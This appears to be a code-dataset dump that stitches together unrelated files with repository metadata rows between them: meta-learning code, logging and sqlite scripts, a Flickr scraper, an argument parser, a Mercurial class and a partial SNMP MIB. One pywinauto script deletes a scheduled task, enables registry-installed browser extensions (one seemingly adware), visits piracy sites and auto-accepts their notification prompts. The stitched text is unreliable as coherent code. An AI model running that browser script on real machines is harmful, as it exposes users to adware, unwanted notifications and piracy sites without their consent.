for updates in fake_grads:
update_module(learner, updates=updates) # 일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
# Client로 접근
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
### 검증용 (FP 9,10과 제대로 된 연산 성능을 비교해서 문제점을 파악)
# 당연히 CLIENT는 32이고 DISJOINT 하지도 않다.
# 다만 첫 16개는 정상진행 # 이후 16개는 사제연산으로 진행하도록 한다.
def fake_adopt_11_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
# 후반 50% client fake 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
# 정상적인 진행 :전반 50% client
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_11_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) # 일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
# Client로 접근
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
| 34.855236
| 113
| 0.745353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8,314
| 0.237319
|
c06a8301008200b139bb039c709d82f05d2164d7
| 1,602
|
py
|
Python
|
sigda/test/graylog.py
|
yangluoshen/sigda
|
83a2149d07edfbe56be95d5dc2a316c044bee54e
|
[
"BSD-2-Clause"
] | null | null | null |
sigda/test/graylog.py
|
yangluoshen/sigda
|
83a2149d07edfbe56be95d5dc2a316c044bee54e
|
[
"BSD-2-Clause"
] | 3
|
2017-08-21T07:26:11.000Z
|
2017-11-09T02:19:23.000Z
|
sigda/test/graylog.py
|
yangluoshen/sigda
|
83a2149d07edfbe56be95d5dc2a316c044bee54e
|
[
"BSD-2-Clause"
] | null | null | null |
#coding:utf-8
#from graypy import GELFHandler
import logging.config
import logging
'''
handler = GELFHandler(host='0.0.0.0', port=12201)
logger = logging.getLogger()
logger.addHandler(handler)
logger.error('catch error')
'''
LOG_LEVEL = 'DEBUG'
def get_log_config(category):
log_file = "{}.log".format(category)
return {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'default': {
'format': '%(asctime)s %(levelname)s %(message)s'
},
'console': {
'format': "%(asctime)s [%(thread)d] %(levelname)s %(funcName)s\t%(message)s"
},
},
'handlers': {
'graylog2': {
'level': LOG_LEVEL,
'formatter': 'default',
'class': 'graypy.GELFHandler',
'host': '0.0.0.0',
'port': 12201,
'debugging_fields': False,
'facility': category
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'console'
},
'file': {
'level': 'INFO',
'class': 'logging.FileHandler',
'formatter': 'console',
'filename': log_file
}
},
'root': {
'handlers': ['graylog2', 'file'],
'level': LOG_LEVEL
}
}
LOG_CONFIG = get_log_config('sigda')
logging.config.dictConfig(LOG_CONFIG)
logging.error('catch error again2')
| 23.910448
| 92
| 0.473159
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 726
| 0.453184
|
c06b4470ee6ba272de73e528bcb01060567707f9
| 142
|
py
|
Python
|
instanotifier/fetcher/scripts/fetcher.py
|
chaudbak/instanotifier
|
d29bc6bd9b7a003403886bfff1376b2c1925cc74
|
[
"MIT"
] | null | null | null |
instanotifier/fetcher/scripts/fetcher.py
|
chaudbak/instanotifier
|
d29bc6bd9b7a003403886bfff1376b2c1925cc74
|
[
"MIT"
] | 6
|
2020-06-06T01:27:17.000Z
|
2022-02-10T11:20:17.000Z
|
instanotifier/fetcher/scripts/fetcher.py
|
chaudbak/instanotifier
|
d29bc6bd9b7a003403886bfff1376b2c1925cc74
|
[
"MIT"
] | null | null | null |
from instanotifier.fetcher import tests
def run():
# is executed when ran with 'manage.py runscript tests'
tests.test_rss_fetcher()
| 20.285714
| 59
| 0.739437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 55
| 0.387324
|
c06b5a0da650cb5b7106dc53e3294c6abe96376c
| 676
|
py
|
Python
|
clase_4/populate_alumnos.py
|
noctilukkas/python-programming
|
0ced5e1390e5501bae79fd30dd2baefd7bc09040
|
[
"Apache-2.0"
] | null | null | null |
clase_4/populate_alumnos.py
|
noctilukkas/python-programming
|
0ced5e1390e5501bae79fd30dd2baefd7bc09040
|
[
"Apache-2.0"
] | null | null | null |
clase_4/populate_alumnos.py
|
noctilukkas/python-programming
|
0ced5e1390e5501bae79fd30dd2baefd7bc09040
|
[
"Apache-2.0"
] | null | null | null |
import sqlite3
def main():
# se establece conexion con la BD y abro cursor
conn = sqlite3.connect("alumnos.db")
cursor = conn.cursor()
# creo una tupla de tuplas para agregar registros a la tabla
alumnos = (
(1, "Juan", "Granizado", 8, 25),
(2, "Esteban", "Quito", 2, 19),
(3, "Marina", "Cordoba", 10, 25),
)
for alumno in alumnos:
cursor.execute("INSERT INTO alumnos VALUES (?, ?, ?, ?, ?)", alumno)
# Para que se agreguen los registros efectivamente tenemos que hacer commit
conn.commit()
print("Datos cargados!")
# Cerramos conexion
conn.close()
if __name__ == '__main__':
main()
| 22.533333
| 79
| 0.597633
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 334
| 0.494083
|
fbe36d61bbb46c7d89d9f7a7b5921b3928eef150
| 366
|
py
|
Python
|
cap11/main.py
|
felipesch92/livroPython
|
061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307
|
[
"MIT"
] | null | null | null |
cap11/main.py
|
felipesch92/livroPython
|
061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307
|
[
"MIT"
] | null | null | null |
cap11/main.py
|
felipesch92/livroPython
|
061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307
|
[
"MIT"
] | null | null | null |
import sqlite3
con = sqlite3.connect('agenda.db')
cursor = con.cursor()
cursor.execute('''
create table if not exists agenda(
nome text,
telefone text)
''')
cursor.execute('''
insert into agenda(nome, telefone)
values(?, ?)
''', ("Tamara", "51-98175-0510"))
con.commit()
cursor.close()
con.close()
| 22.875
| 42
| 0.562842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 225
| 0.614754
|
fbe380b10e29919d567688beee1e5f00654464f3
| 4,298
|
py
|
Python
|
falconcv/data/scraper/flickr_scraper.py
|
haruiz/FalconCV
|
0c9444451a60c8f6375c30426811160ae79b02ba
|
[
"Apache-2.0"
] | 16
|
2020-06-05T01:26:04.000Z
|
2020-09-18T23:56:14.000Z
|
falconcv/data/scraper/flickr_scraper.py
|
haruiz/FalconCV
|
0c9444451a60c8f6375c30426811160ae79b02ba
|
[
"Apache-2.0"
] | 13
|
2020-06-01T17:35:22.000Z
|
2020-09-22T23:19:27.000Z
|
falconcv/data/scraper/flickr_scraper.py
|
haruiz/FalconCV
|
0c9444451a60c8f6375c30426811160ae79b02ba
|
[
"Apache-2.0"
] | 2
|
2020-06-06T06:10:58.000Z
|
2020-06-08T07:19:24.000Z
|
import logging
import math
import re
import time
import dask
import numpy as np
import requests
import json
import xml.etree.ElementTree as ET
from falconcv.data.scraper.scraper import ImagesScraper
from falconcv.util import ImageUtil
logger = logging.getLogger(__name__)
FLICKR_ENDPOINT = "https://www.flickr.com/services/rest"
# List of sizes:
# url_o: Original (4520 × 3229)
# url_k: Large 2048 (2048 × 1463)
# url_h: Large 1600 (1600 × 1143)
# url_l=: Large 1024 (1024 × 732)
# url_c: Medium 800 (800 × 572)
# url_z: Medium 640 (640 × 457)
# url_m: Medium 500 (500 × 357)
# url_n: Small 320 (320 × 229)
# url_s: Small 240 (240 × 171)
# url_t: Thumbnail (100 × 71)
# url_q: Square 150 (150 × 150)
# url_sq: Square 75 (75 × 75)
class FlickrScraper(ImagesScraper):
def __init__(self, api_key):
super(FlickrScraper, self).__init__()
self.api_key = api_key
def _authenticate(self):
pass
def _get_total_matches(self, q):
total_matches = 0
try:
response = requests.get(url=FLICKR_ENDPOINT, params={
"api_key": self.api_key,
"method": "flickr.photos.search",
"tags": ",".join(q),
"tag_mode": "any",
# "privacy_filter": "1"
"content_type": 1,
"media": "photos",
"per_page": 0,
"format": "json"
})
if response.status_code == 200:
json_text = re.search(r'\((.*?)\)', response.text).group(1)
json_object = json.loads(json_text)
if json_object["stat"] == "ok":
total_matches = int(json_object["photos"]["total"])
# total_matches = json_object["photos"]
except Exception as ex:
logger.error("Error making the request : {}".format(ex))
return total_matches
def _request_photos(self, q, count, page):
images = []
try:
response = requests.get(url=FLICKR_ENDPOINT, params={
"api_key": self.api_key,
"method": "flickr.photos.search",
"tags": ",".join(q),
"tag_mode": "any",
# "privacy_filter": "1"
"content_type": 1,
"media": "photos",
"per_page": count,
"page": page,
"extras": ",".join(["url_o", "url_k", "url_h", "url_l", "url_c", "url_m"])
})
if response.status_code == 200:
try:
# print(response.text)
root: ET.Element = ET.fromstring(response.text)
stat = root.get("stat")
if stat == "ok":
for photo in root.iterfind("photos/photo"):
photo: ET.Element
images.append(photo.attrib)
except Exception as ex:
logger.error("error gathering the response: {}".format(ex))
except Exception as ex:
logger.error("Error making the request : {}".format(ex))
return images
@dask.delayed
def _fetch_image(self, image_info, sz):
try:
if sz in image_info:
url = image_info[sz]
return ImageUtil.url2img(url)
except Exception as ex:
logger.error("Error fetching the image: " % ex)
return None
def fetch(self, q, batch_size: int = 100, timestamp=1, sz="url_m"):
try:
assert batch_size <= 500, "invalid count parameter"
total_matches = self._get_total_matches(q)
logger.debug("{} images found ".format(total_matches))
number_of_pages = math.ceil(total_matches / batch_size)
for page in range(1, number_of_pages):
photos = self._request_photos(q, batch_size, page)
delayed_tasks = list(map(lambda img: self._fetch_image(img, sz), photos))
compute_result = dask.compute(*delayed_tasks)
yield [img for img in compute_result if isinstance(img, np.ndarray)]
time.sleep(timestamp)
except Exception as ex:
logger.error("error fetching the images: {}".format(ex))
| 37.701754
| 90
| 0.543509
| 3,566
| 0.827378
| 829
| 0.192343
| 299
| 0.069374
| 0
| 0
| 1,090
| 0.2529
|
fbe3b3f30ddf6f664ac393236c6cc50652de4531
| 9,893
|
py
|
Python
|
argparser.py
|
geoff-smith/MCplotscripts
|
16dd5fd849671bb082a71f08492676be876209d3
|
[
"MIT"
] | null | null | null |
argparser.py
|
geoff-smith/MCplotscripts
|
16dd5fd849671bb082a71f08492676be876209d3
|
[
"MIT"
] | null | null | null |
argparser.py
|
geoff-smith/MCplotscripts
|
16dd5fd849671bb082a71f08492676be876209d3
|
[
"MIT"
] | null | null | null |
# argParser
# this class generates a RunParams object from the args passed to the script
from runparams import *
import os.path
import string
## handles args passed to the program
#
class ArgParser(object):
def parsePtCutString(self, ptCutString):
return map(float, string.split(ptCutString,',') )
def parseEventsString(self, eventsString):
return map(int, string.split(eventsString,',') )
def displayUserInfo(self):
print ""
print "o------------------o"
print "|Extracthistos Info|"
print "o------------------o"
print ""
print "[example usage]"
print ""
print "extracthistos inputFile.root"
print ""
print "extracthistos inputFile.root /intputDir/*.root --visualize --output outputfile-extracted.root --ptcuts 20,30,50,100 --etacut 2.5 --limit 100"
print ""
print "extracthistos inputFile.root /intputDir/*.root -v -o outputfile-extracted.root -p 20,30,50,100 -e 2.5 -l 100"
print ""
print "[switches]"
print " -d | --debug: Show debug information"
print " -e | --etacut: Set etaCut (double)"
print " -f | --force: Force overwriting of output file"
print " -i | --info: Shows this info"
print " -l | --limit: Limit maximum # of events processed"
print " -o | --output: Set output file (string)"
print " -od | --output-outputdirectory: Set output directory (string)"
print " -p | --ptcuts: Set pTcuts (list of doubles seperated by ',')"
print " -# | --events: Specify events to processed (list of ints seperated by ',')"
print " -m | --multi-processing: create n (int) subprocesses"
print " -% | --modulo: process only every nth event (int)"
print " -%r | --modulo-rest: process only every nth + r event (int)"
print " -v | --visualize: Create visualization(s)"
print " -vs | --visualize-skip-copies: Do not render non-physical particle copies"
print " -vnu | --visualize-no-underlying-event: Do not visualize the underlying event"
print " -vni | --visualize-no-main-interaction: Do not visualize the main interaction"
print " -vsj | --visualize-color-special-jets: Color special particle jets"
print " -vce | --visualize-cutoff-energy: Specify Visualization energy cutoff (double)"
print " -vcs | --visualize-cutoff-special-jets: Cutoff Special Jets"
print " -vcr | --visualize-cutoff-radiation: Cutoff ISR/FSR Jets"
print " -vme | --visualize-mode-energy: Color particles by their energy"
print " -vmp | --visualize-mode-pt: Color particles by their pT"
print " -vr | --visualize-renderer: Specify GraphViz renderer (string), defaults to 'dot'"
print ""
def __init__(self, args):
self.runParams = RunParams()
lenArgs = len(args)
skip = False
forceOutputOverride = False
for i in range (0, lenArgs):
# skip first arg as it's the script's name
if i == 0 or skip:
skip = False
continue
# provide arg and nextArg (if possible)
arg = args[i]
nextArg = None
if (i < lenArgs - 1):
nextArg = args[i+1]
# parse switches
if ( arg == "-d" ) or ( arg == "--debug" ) :
self.runParams.useDebugOutput = True
continue
if ( arg == "-e" ) or ( arg == "--etacut" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.eta = float(nextArg)
skip = True
continue
if ( arg == "-f" ) or ( arg == "--force" ) :
forceOutputOverride = True
continue
if ( arg == "-i" ) or ( arg == "--info" ) :
self.displayUserInfo()
self.runParams.run = False
break
if ( arg == "-l" ) or ( arg == "--limit" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.maxEvents = int(nextArg)
skip = True
continue
if ( arg == "-o" ) or ( arg == "--output" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
if nextArg [-15:] <> '-extracted.root':
raise Exception("'" + arg + "': Output file must end with '-extracted.root'!")
self.runParams.outputFile = nextArg
skip = True
continue
if ( arg == "-p" ) or ( arg == "--ptcuts" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
ptCutString = nextArg
self.runParams.pTCuts = self.parsePtCutString(ptCutString)
skip = True
continue
if ( arg == "-v" ) or ( arg == "--visualize" ) :
self.runParams.useVisualization = True
continue
if ( arg == "-vs" ) or ( arg == "--visualize-skip-copies" ) :
self.runParams.visualizationSkipCopies = True
continue
if ( arg == "-vnu" ) or ( arg == "--visualize-no-underlying-event" ) :
self.runParams.visualizationShowUnderlyingEvent = False
continue
if ( arg == "-vni" ) or ( arg == "--visualize-no-main-interaction" ) :
self.runParams.visualizationShowMainInteraction = False
continue
if ( arg == "-vsj" ) or ( arg == "--visualize-color-special-jets" ) :
self.runParams.visualizationColorSpecialJets = True
continue
if ( arg == "-vme" ) or ( arg == "--visualize-mode-energy" ) :
self.runParams.visualizationEnergyMode = True
continue
if ( arg == "-vmp" ) or ( arg == "--visualize-mode-pt" ) :
self.runParams.visualizationPtMode = True
continue
if ( arg == "-vce" ) or ( arg == "--visualize-cutoff-energy" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.visualizationEnergyCutoff = int(nextArg)
skip = True
continue
if ( arg == "-vcr" ) or ( arg == "--visualize-cutoff-radiation" ) :
self.runParams.visualizationCutoffRadiation = True
continue
if ( arg == "-vcs" ) or ( arg == "--visualize-cutoff-special-jets" ) :
self.runParams.visualizationCutSpecialJets = True
continue
#if ( arg == "-vp" ) or ( arg == "--visualize-pt-cutoff" ) :
#if nextArg is None or nextArg[0] == '-':
#raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
#self.runParams.visualizationPtCutoff = int(nextArg)
#skip = True
#continue
if ( arg == "-vr" ) or ( arg == "--visualize-renderer:" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.visualizationRenderer = nextArg
skip = True
continue
#if ( arg == "-z" ) or ( arg == "--zero-jets" ) :
#self.runParams.zeroAdditionalJets = True
#continue
if ( arg == "-#" ) or ( arg == "--events" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
eventsString = nextArg
self.runParams.events = self.parseEventsString(eventsString)
skip = True
continue
if ( arg == "-od" ) or ( arg == "--output-outputdirectory" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.outputDir = nextArg
skip = True
continue
if ( arg == "-m" ) or ( arg == "--multi-processing" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.multiProcessing = int(nextArg)
skip = True
continue
if ( arg == "-%" ) or ( arg == "--modulo" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.modulo = int(nextArg)
skip = True
continue
if ( arg == "-%r" ) or ( arg == "--modulo-rest" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.moduloRest = int(nextArg)
skip = True
continue
if (arg[0] == '-'):
raise Exception("'" + arg + "' is not a valid switch!")
# deny input files ending with '-extracted.root', as this is our signature for output files:
if arg[-15:] == '-extracted.root':
print "Warning: File '" + arg + "' is being skipped."
continue
# parse input files:
if arg[-5:] == '.root':
thisFile = arg
if thisFile[:7] == "/store/":
if not os.path.isfile(thisFile):
thisFile = "root://xrootd.ba.infn.it/" + thisFile
else:
if not os.path.isfile(thisFile):
raise Exception("File '" + thisFile + "' does not exist!")
self.runParams.inputFileList.append(thisFile)
continue
raise Exception("'" + arg + "' is not a valid root file!")
if self.runParams.useVisualization and len(self.runParams.inputFileList) > 1:
raise Exception("Visualization is allowed only for exactly one input file.")
if self.runParams.run:
if os.path.isfile(self.runParams.outputFile) and not forceOutputOverride:
raise Exception("'" + self.runParams.outputFile + "' exists. Use the --force switch to force overriding.")
if len(self.runParams.outputDir) <> 0:
if not os.path.exists(self.runParams.outputDir):
os.makedirs(self.runParams.outputDir)
self.runParams.outputFilePath = self.runParams.outputDir + "/" + self.runParams.outputFile
else:
self.runParams.outputFilePath = self.runParams.outputFile
#self.displayInfo()
| 39.730924
| 153
| 0.574548
| 9,707
| 0.981199
| 0
| 0
| 0
| 0
| 0
| 0
| 4,143
| 0.418781
|
fbe4f5813f57f07bcd01eac89fa0f4bcc8abfeac
| 1,326
|
py
|
Python
|
floppy/_surf-garbage.py
|
hillscott/windows
|
ba32cd43db1bd1495f0150ab0c32ee63b5a5d415
|
[
"Apache-2.0"
] | null | null | null |
floppy/_surf-garbage.py
|
hillscott/windows
|
ba32cd43db1bd1495f0150ab0c32ee63b5a5d415
|
[
"Apache-2.0"
] | null | null | null |
floppy/_surf-garbage.py
|
hillscott/windows
|
ba32cd43db1bd1495f0150ab0c32ee63b5a5d415
|
[
"Apache-2.0"
] | null | null | null |
# pip install -U pywinauto
from pywinauto.application import Application
import subprocess
import time
subprocess.run('SCHTASKS /DELETE /TN BuildTasks\\Sites /f')
app = Application(backend='uia')
app.start('C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe --force-renderer-accessibility ')
window = app.top_window()
# Allow the registry installed extensions to load...
time.sleep(45)
ch_window = window.child_window(title="Address and search bar", control_type="Edit")
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}chrome://extensions/{ENTER}')
time.sleep(3)
# Enable Honey (or disable google drive offline)
dlg = window.button6
try:
dlg.click()
except Exception:
dlg.close()
# Enable Soccer wallpapers (or Soccer wallpapers)
dlg = window.button9
try:
dlg.click()
except Exception:
dlg.close()
# Enable Soccer wallpapers (if it exists)
dlg = window.button12
try:
dlg.click()
except Exception:
dlg.close()
time.sleep(5)
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}https://thepiratebay.org{ENTER}')
time.sleep(10)
# Allow notifications
dlg = window.AllowButton
try:
dlg.wait_not('visible', timeout=2)
dlg.click()
except Exception:
dlg.close()
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}{BACKSPACE}https://yts.mx{ENTER}')
time.sleep(3)
window.close()
| 27.625
| 103
| 0.748115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 557
| 0.42006
|
fbe52989054e585791a8f893935e850e1910b673
| 992
|
py
|
Python
|
sla/migrations/0005_slaprobe_workflow.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 84
|
2017-10-22T11:01:39.000Z
|
2022-02-27T03:43:48.000Z
|
sla/migrations/0005_slaprobe_workflow.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 22
|
2017-12-11T07:21:56.000Z
|
2021-09-23T02:53:50.000Z
|
sla/migrations/0005_slaprobe_workflow.py
|
prorevizor/noc
|
37e44b8afc64318b10699c06a1138eee9e7d6a4e
|
[
"BSD-3-Clause"
] | 23
|
2017-12-06T06:59:52.000Z
|
2022-02-24T00:02:25.000Z
|
# ----------------------------------------------------------------------
# Migrate SLAProbe to workflow
# ----------------------------------------------------------------------
# Copyright (C) 2007-2021 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from pymongo import UpdateMany
from bson import ObjectId
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
depends_on = [("wf", "0005_slaprobe_default")]
def migrate(self):
coll = self.mongo_db["noc.sla_probes"]
coll.bulk_write(
[
# "Planned"
UpdateMany({}, {"$set": {"state": ObjectId("607a7e1d3d18d4fb3c12032a")}}),
]
)
# Service Profile Workflow
self.mongo_db["noc.sla_profiles"].bulk_write(
[UpdateMany({}, {"$set": {"workflow": ObjectId("607a7dddff3a857a47600b9b")}})]
)
| 31
| 90
| 0.484879
| 525
| 0.529234
| 0
| 0
| 0
| 0
| 0
| 0
| 525
| 0.529234
|
fbe699dad305df809951dcf85f4ec36f0f78ab23
| 2,640
|
py
|
Python
|
seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py
|
guanjue/seqpos
|
ab9308ad128547ca968a1d944490710e583703bc
|
[
"MIT"
] | null | null | null |
seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py
|
guanjue/seqpos
|
ab9308ad128547ca968a1d944490710e583703bc
|
[
"MIT"
] | null | null | null |
seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py
|
guanjue/seqpos
|
ab9308ad128547ca968a1d944490710e583703bc
|
[
"MIT"
] | null | null | null |
# dirstateguard.py - class to allow restoring dirstate after failure
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
from .i18n import _
from . import (
error,
narrowspec,
util,
)
class dirstateguard(util.transactional):
'''Restore dirstate at unexpected failure.
At the construction, this class does:
- write current ``repo.dirstate`` out, and
- save ``.hg/dirstate`` into the backup file
This restores ``.hg/dirstate`` from backup file, if ``release()``
is invoked before ``close()``.
This just removes the backup file at ``close()`` before ``release()``.
'''
def __init__(self, repo, name):
self._repo = repo
self._active = False
self._closed = False
self._backupname = 'dirstate.backup.%s.%d' % (name, id(self))
self._narrowspecbackupname = ('narrowspec.backup.%s.%d' %
(name, id(self)))
repo.dirstate.savebackup(repo.currenttransaction(), self._backupname)
narrowspec.savebackup(repo, self._narrowspecbackupname)
self._active = True
def __del__(self):
if self._active: # still active
# this may occur, even if this class is used correctly:
# for example, releasing other resources like transaction
# may raise exception before ``dirstateguard.release`` in
# ``release(tr, ....)``.
self._abort()
def close(self):
if not self._active: # already inactivated
msg = (_("can't close already inactivated backup: %s")
% self._backupname)
raise error.Abort(msg)
self._repo.dirstate.clearbackup(self._repo.currenttransaction(),
self._backupname)
narrowspec.clearbackup(self._repo, self._narrowspecbackupname)
self._active = False
self._closed = True
def _abort(self):
narrowspec.restorebackup(self._repo, self._narrowspecbackupname)
self._repo.dirstate.restorebackup(self._repo.currenttransaction(),
self._backupname)
self._active = False
def release(self):
if not self._closed:
if not self._active: # already inactivated
msg = (_("can't release already inactivated backup: %s")
% self._backupname)
raise error.Abort(msg)
self._abort()
| 34.736842
| 77
| 0.610227
| 2,260
| 0.856061
| 0
| 0
| 0
| 0
| 0
| 0
| 1,014
| 0.384091
|
fbe71debd90d8d660d1121d1807a3090d9eabd7b
| 2,061
|
py
|
Python
|
config.py
|
mF2C/UserManagement
|
0a44f8fbf86a140156da2f87a25490345f296cbb
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
mF2C/UserManagement
|
0a44f8fbf86a140156da2f87a25490345f296cbb
|
[
"Apache-2.0"
] | 12
|
2017-10-25T08:05:32.000Z
|
2019-11-13T14:29:42.000Z
|
config.py
|
mF2C/UserManagement
|
0a44f8fbf86a140156da2f87a25490345f296cbb
|
[
"Apache-2.0"
] | 1
|
2017-10-24T10:13:55.000Z
|
2017-10-24T10:13:55.000Z
|
"""
CONFIGURATION FILE
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Roi Sucasas Font, Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 18 oct. 2018
@author: Roi Sucasas - ATOS
"""
#!/usr/bin/python
dic = { "VERSION": "1.3.10",
# USER MANAGEMENT MODULE MODE: "DEFAULT", "MF2C" , "STANDALONE"
"UM_MODE": "MF2C",
# CIMI
"CIMI_URL": "http://cimi:8201/api",
"DEVICE_USER": "rsucasas",
# SERVER - REST API
"SERVER_PORT": 46300,
"HOST_IP": "localhost",
"API_DOC_URL": "/api/v2/um",
# working dir: "C://TMP/tmp/mf2c/um/" "/tmp/mf2c/um/"
"UM_WORKING_DIR_VOLUME": "/tmp/mf2c/um/",
# db
"DB_SHARING_MODEL": "dbt1",
"DB_USER_PROFILE": "dbt2",
# VERIFY_SSL controls whether we verify the server's TLS certificate or not
"VERIFY_SSL": False,
# for testing the interaction with the lifecycle management
"ENABLE_ASSESSMENT": True,
# CIMI RESOURCES managed by this component
"CIMI_PROFILES": "user-profile",
"CIMI_SHARING_MODELS": "sharing-model",
"SERVICE_CONSUMER": True,
"RESOURCE_CONTRIBUTOR": True,
"MAX_APPS": 2,
"BATTERY_LIMIT": 50,
"GPS_ALLOWED": True,
"MAX_CPU_USAGE": 50,
"MAX_MEM_USAGE": 50,
"MAX_STO_USAGE": 50,
"MAX_BANDWITH_USAGE": 50,
# URLs / ports from other components:
# LIFECYCLE
"URL_PM_LIFECYCLE": "http://lifecycle:46000/api/v2/lm"
}
# APPS RUNNING
APPS_RUNNING = 0
| 32.714286
| 109
| 0.501698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,255
| 0.608928
|
fbe8a390825becc2ff9eab5332457693f2473fbc
| 3,606
|
py
|
Python
|
pysnmp-with-texts/IANA-MALLOC-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/IANA-MALLOC-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/IANA-MALLOC-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module IANA-MALLOC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IANA-MALLOC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:50:25 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
